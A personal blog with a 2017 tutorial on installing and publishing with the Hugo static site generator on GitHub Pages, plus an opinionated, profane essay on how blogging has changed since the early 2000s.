The default choice of static site generator is Jekyll, which has the most support but is troublesome to install and use. Hugo is a popular alternative that is easier to install and faster to work with. It’s implemented in Golang, a.k.a. Go, which means it is written in a statically compiled language (The Best Kind) and ships as a single, dependency-free binary. Dependency hell is the bane of my existence. It’s like work that you have to do before you can start working. Anyway, let’s look at how to get started.

Hugo Install Process (MacOS)

This is so simple, and its simplicity is the reason why I went with Hugo after trying the more popular Jekyll, which was a mess.

brew update && brew install hugo
hugo new site myBlog
cd myBlog
git clone https://github.com/dplesca/purehugo.git themes/purehugo
echo "theme = purehugo" >> config.toml 

Creating or customizing themes is beyond the scope of this post, but what we are doing here is “installing” a pre-baked Hugo theme, and then setting it as our default.

Hugo Workflow: Drafting & Publishing a Post (MacOS)

In order to create a new post for your blog:

cd myBlog
hugo new post/myReviewOfHugo.md
open content/post/myReviewOfHugo.md # write the post in your text editor

# Optional: launch a local webserver, give it a sec, and preview the blog
hugo server & sleep 2 && open http://localhost:1313/blog/
killall hugo # because we left hugo running in the background there

While the server is running, you can actually continue to edit the post in your editor. The server will live update the view in your browser. This is optional, but it will verify that everything will look correct when you publish.

When you’re satisfied, you can generate the actual web content to disk, and publish it. The following steps assume you are using Github Pages, so the publish is made using a git push.

# You must already have a GitHub project and, in its settings page, have set GitHub Pages
# to serve from "master branch /docs folder". In this example, the project name is "blog".

# These are the one-time Hugo steps:
echo "publishDir = docs" >> config.toml
echo "baseURL = https://myname.github.com/blog" >> config.toml

# These are the one-time Git steps:
rm -rf themes/purehugo/.git # delete the theme's own git metadata so it doesn't interfere with our repo
git init  # turn this directory into a git repo
git remote add origin https://github.com/myname/blog.git

# These are the only steps needed every time you publish new content:
hugo  # this generates HTML + JS + CSS under the publishdir (blog/docs/)
git add -A
git commit -m "Add a blog post about whatever."
git push

That’s all there is to it, although you can always use a different Git client if you don’t like the command line. I sure as hell don’t like it (I use Atlassian Sourcetree) but it’s up to you.

Post Metadata: WTF is “Front Matter” ?

In each post (each Markdown file), there is some metadata in a header at the top of the file, called “front matter.” Jekyll was the first to introduce this concept (in name, at least), but it is common across other static generators now. Hugo lets you write front matter in YAML, JSON, or TOML (the default). If you’ve worked in web development, surely you’ve heard of JSON, but now you may be asking: WTF are YAML and TOML?

These are general-purpose configuration syntaxes that static site generators have adopted for their settings. It seems to be a case of “reinventing the wheel” of INI files, which have been around for decades. Basically, a config file. Key-value pairs. Associative array. Hash table (please don’t shorten it to just “hash,” words have meanings, know the difference). Dictionary. They’re all basically the same thing. YAML dates back to the early 2000s as a minimalist-syntax alternative to XML, and JSON emerged around the same time as another minimalist alternative to XML. We’ll get this right some day.
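To illustrate how interchangeable these formats are, here is one hypothetical setting written in each of them (the key name is made up, purely for illustration):

INI / TOML:   title = "My Blog"
YAML:         title: My Blog
JSON:         { "title": "My Blog" }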

The CEO of GitHub and inventor of Jekyll, probably high on the smell of his own farts, decided in 2013 that YAML needed to be even more minimal, and named the result after himself: TOML, “Tom’s Obvious, Minimal Language,” which primarily because of the fame of its creator has now spread to a few other projects. Thus, we have minimalized almost all the way back to INI files (except now it has been “standardized”). Progress.

Oh, and by the way, none of these are actually markup languages at all. They just aren’t. The “ML” in YAML literally stands for “Ain’t Markup Language,” and in TOML it stands for “Minimal Language.” The insistence on tacking the letters -ML onto config file formats is basically an inside joke at this point.

The takeaway for me is that in the mid-2000s it became fashionable to ditch braces and brackets in all syntax for everything, in favor of careful indentation. Thus returning to the fashion of the 1970s and FORTRAN. You know what’s popular today, though? Look at Go, Rust, and Swift. Yea that’s right, compiled languages with curly braces are back again. Urge to kill risinnnnnnng. All right, deep breaths.

Anyway, within this “front matter,” you can define tags and categories, timestamps, and titles for every post. For example, the front matter for this post was defined as such:

+++
Tags = ["web","blogging","Hugo", "Jekyll", "YAML", "TOML"]
Description = "Initial impressions on the static site generator, Hugo"
date = "2017-02-03T19:07:12-05:00"
title = "Hugo, the static site generator"
Categories = ["web","blogging","Hugo"]
+++

You can also set optional variables, like a publish date in the future (Hugo will not render the post into the publish directory until that date arrives), or an alias (if you want to forward visitors from another URL to this post instead).
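For instance, here is a quick sketch of what those optional fields might look like in this post’s front matter, assuming Hugo’s publishDate and aliases field names (the values below are made up for illustration):

+++
title = "Hugo, the static site generator"
date = "2017-02-03T19:07:12-05:00"
publishDate = "2017-03-01T00:00:00-05:00"  # Hugo holds the post back until this date
aliases = ["/blog/old-hugo-post/"]         # visitors to this old URL get forwarded here
+++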

The configuration file for your Hugo site, config.toml, is also in this syntax.

That more or less covers the basics of Hugo, and static site generators like it. My next post will be about Markdown (an actual markup language).

03 Feb 2017, 15:43

How to Blog in 2017

My first blog, back in the early 2000s, was on a hosted blogging platform known as Blogger. It was simple and convenient: as the admin you just logged into the Blogger service, edited posts in your browser, and hit publish. This is basically how Tumblr still works today, although Tumblr’s innovation was to include media file hosting and allow everyone to repost each other’s content.

But Blogger content was static, and textual. You could post a few paragraphs of text, and embed images if they were hosted elsewhere. Only later did Google buy out the service and integrate it with their photo-hosting service. In the mid-2000s, many geeks wanted more flexibility, like the ability to limit access to members only, integrate their own photo/video/audio collections, and – most importantly – control the appearance of their blog.

So my second blog was generated with a Web Content Management System (CMS) and self-hosted on a home Windows XP PC running the “WAMP” software stack, with a DNS record from a free dynamic DNS service. If you’re a system admin or security expert you’re probably cringing. I am too. In hindsight, it’s a miracle if that PC was not 0wned by a hacker at some point, but at least I have no evidence to believe it was. But I thought my blog was pretty cool: it had a custom look, a custom domain name, its own forums, file storage, and a weather widget on the sidebar. I believe it was using the Drupal CMS. The 2000s saw the rise of the “web app,” the idea that an application was something that ran in a scripting language on a web server and presented you with a web page as the user interface. As a system programmer who thinks an application is a single self-contained compiled binary, I thought this was anathema. But the rest of the tech world decided otherwise: websites that were not database-backed and server-side-scripted were totally 90s! That meant lame. 90s wasn’t cool again yet.

The reason why the self-hosted CMS approach to blogging is cringey is that it is notoriously difficult to secure a CMS, especially one written in PHP. PHP is now known to be prone to recurring security issues because of flaws in its design (unvalidated input, access control problems, command injection issues, etc.), and the use of a SQL database means fighting a war against SQL injection attacks from anyone who uses your site. Spammers will leave spam comments. You just want to run a blog, but now you’re a system admin for a web server, a database admin for a database, and you have to understand the PHP (or Java, or whatever) that generates your site on the fly every time a visitor loads a page. If you ever want to use a web hosting service for your CMS-based site instead of hosting it at home, you have to pay real money, because supporting and securing Apache, PHP, and MySQL is a full-time job! On top of all of that, all of this script and database stuff makes the site slower to load and prone to Denial of Service attacks.

This is no way to live. And so, as is typical, the tech community decided that what is old is new again, and that static sites were actually a good idea that should never have been abandoned. Rolling my eyes so hard I went temporarily blind, I actually resisted even caring about the cool way to blog in the 2010s. I used LiveJournal for a bit. I tried a hosted Wordpress (Wordpress.com) account to blog about game console emulators. I got into using Tumblr, even though (or maybe because) the tech community is not on there. But now I’ve decided to give a fresh look at what’s fresh, and give it a chance.

Here are some things I noticed about the current Preferred Way for Cool Kids to Blog.

  • If you write any kind of code for a living, you host it on a free hosting service in the .io TLD. This is just what is fashionable, and like all fashion choices, it can’t really be explained. “Everyone is doing it”, including this blog. We are not all hosting sites in the British Indian Ocean Territory, but yes, this TLD exists because the UK stole the Chagos Islanders’ land during the Cold War, and its only other claim to fame might be its black site CIA torture prison. How’s that for oblivious Silicon Valley tech privilege!
  • Because HTML, JS, and CSS are nearly impossible to work in directly anymore (much like assembly code), people write their web page content in a highly simplified markup language, and then run that through a compiler (oh, sorry, static site generator) to produce a web site in actual HTML, JS, and CSS. The output is then posted to a web hosting service. There are some 450 static site generators to choose from. This site uses Hugo, which I’ll talk about in a future post. An even more popular choice is Jekyll, which is fine…for me to poop on.
  • The simplified markup language of choice currently is Markdown, which will also be the subject of a future post because it is pretty neat.
  • Because supporting the ability for visitors to post comments would require a dynamic site, static sites have outsourced this responsibility to third-party services. That is, comments are implemented with an embedded JavaScript element that is loaded from a remote service. The dominant choice of service at the moment is Disqus. This and any other user-account-based service that embeds its content on your blog is a privacy problem: it means Disqus is basically assigning you an identifier and following you around to all of the Disqus-enabled sites you visit. Ghostery blocks Disqus by default, for this reason. I suggest using Twitter to reach me if you have a comment.
  • Because static sites cannot track how many visitors they get or where they came from, that too has been outsourced. Google Analytics is now more prevalent than HPV and herpes combined. I have had to delete it out of every web-related code repository that I have borrowed to make anything. Even if I’m the last one on Earth who cares about privacy, I will not be including that here. The same goes for social media sharing links. You’re a big boy and/or girl, I bet you’ll figure out how to share a URL yourself!

So there you have it, my take on the Way to Blog in the 2010s for Cool Kids. Thanks for reading. – MM